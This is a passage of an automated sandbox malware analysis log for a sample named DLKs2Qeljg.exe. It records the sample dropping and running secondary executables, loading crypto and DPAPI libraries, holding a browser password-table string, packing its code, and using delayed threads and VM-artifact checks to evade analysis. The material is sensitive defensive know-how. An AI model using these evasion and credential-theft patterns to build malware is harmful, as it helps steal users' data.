        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7076
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeMutant created: \Sessions\1\BaseNamedObjects\5h48t4j4t1rr
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeFile created: C:\Users\user\AppData\Local\Temp\67E6.tmpJump to behavior
        Source: DLKs2Qeljg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 67E6.tmp.exe, 00000001.00000003.1779685555.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1791170219.0000000002E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: DLKs2Qeljg.exeReversingLabs: Detection: 55%
        Source: DLKs2Qeljg.exeVirustotal: Detection: 38%
        Source: unknownProcess created: C:\Users\user\Desktop\DLKs2Qeljg.exe "C:\Users\user\Desktop\DLKs2Qeljg.exe"
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeProcess created: C:\Users\user\AppData\Local\Temp\67E6.tmp.exe "C:\Users\user\AppData\Local\Temp\67E6.tmp.exe"
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1800
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeProcess created: C:\Users\user\AppData\Local\Temp\67E6.tmp.exe "C:\Users\user\AppData\Local\Temp\67E6.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeUnpacked PE file: 0.2.DLKs2Qeljg.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.munil:W;.farujub:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeUnpacked PE file: 1.2.67E6.tmp.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeUnpacked PE file: 0.2.DLKs2Qeljg.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeUnpacked PE file: 1.2.67E6.tmp.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
        Source: DLKs2Qeljg.exeStatic PE information: section name: .munil
        Source: DLKs2Qeljg.exeStatic PE information: section name: .farujub
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_00410756 push ecx; ret 0_2_00410769
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0043DB67 push dword ptr [esp+ecx-75h]; iretd 0_2_0043DB6B
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0040FD82 push ecx; ret 0_2_0040FD95
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0058D051 push 00000003h; ret 0_2_0058D055
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0058B294 push es; iretd 0_2_0058B2A5
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0058C364 push ds; ret 0_2_0058C36D
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0058F660 pushad ; ret 0_2_0058F67C
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0215798F push esp; retf 0_2_02157997
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_021309BD push ecx; ret 0_2_021309D0
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0213CE08 push es; retf 0_2_0213CE0D
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02157F8D push esp; retf 0_2_02157F8E
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0212FFE9 push ecx; ret 0_2_0212FFFC
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02159DD8 pushad ; retf 0_2_02159DDF
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_3_007EAB77 push esi; retf 1_3_007EAB78
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh1_2_00441853
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00563CFE push esi; retn 001Ch1_2_00563D02
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00563156 push ebx; ret 1_2_00563157
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0056512A pushad ; ret 1_2_0056512B
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00565195 pushfd ; ret 1_2_00565196
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0211B05A push ebp; iretd 1_2_0211B05D
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02131AB7 push eax; mov dword ptr [esp], 0E0908DBh1_2_02131ABA
        Source: DLKs2Qeljg.exeStatic PE information: section name: .text entropy: 7.5387740552975195
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.810340877907069
        Source: 67E6.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.810340877907069
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJump to dropped file
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeFile created: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeJump to dropped file
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0040E96A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E96A
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeWindow / User API: threadDelayed 368Jump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeWindow / User API: threadDelayed 9620Jump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-63709
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeAPI coverage: 5.1 %
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exe TID: 6940Thread sleep count: 368 > 30Jump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exe TID: 6940Thread sleep time: -265696s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exe TID: 6940Thread sleep count: 9620 > 30Jump to behavior
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exe TID: 6940Thread sleep time: -6945640s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exe TID: 7068Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeLast function: Thread delayed
        Source: DLKs2Qeljg.exe, 00000000.00000002.4149199546.0000000000616000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010693772.0000000000616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWlk
        Source: Amcache.hve.4.drBinary or memory string: VMware
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
        Source: DLKs2Qeljg.exe, 00000000.00000003.4010693772.00000000005E6000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000002.4149154646.00000000005E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
        Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: DLKs2Qeljg.exe, 00000000.00000002.4149199546.0000000000616000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010693772.0000000000616000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000002.1945858989.0000000000739000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778438197.0000000000774000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.4.drBinary or memory string: vmci.sys
        Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.4.drBinary or memory string: VMware20,1
        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26241
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004402C0 LdrInitializeThunk,1_2_004402C0
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
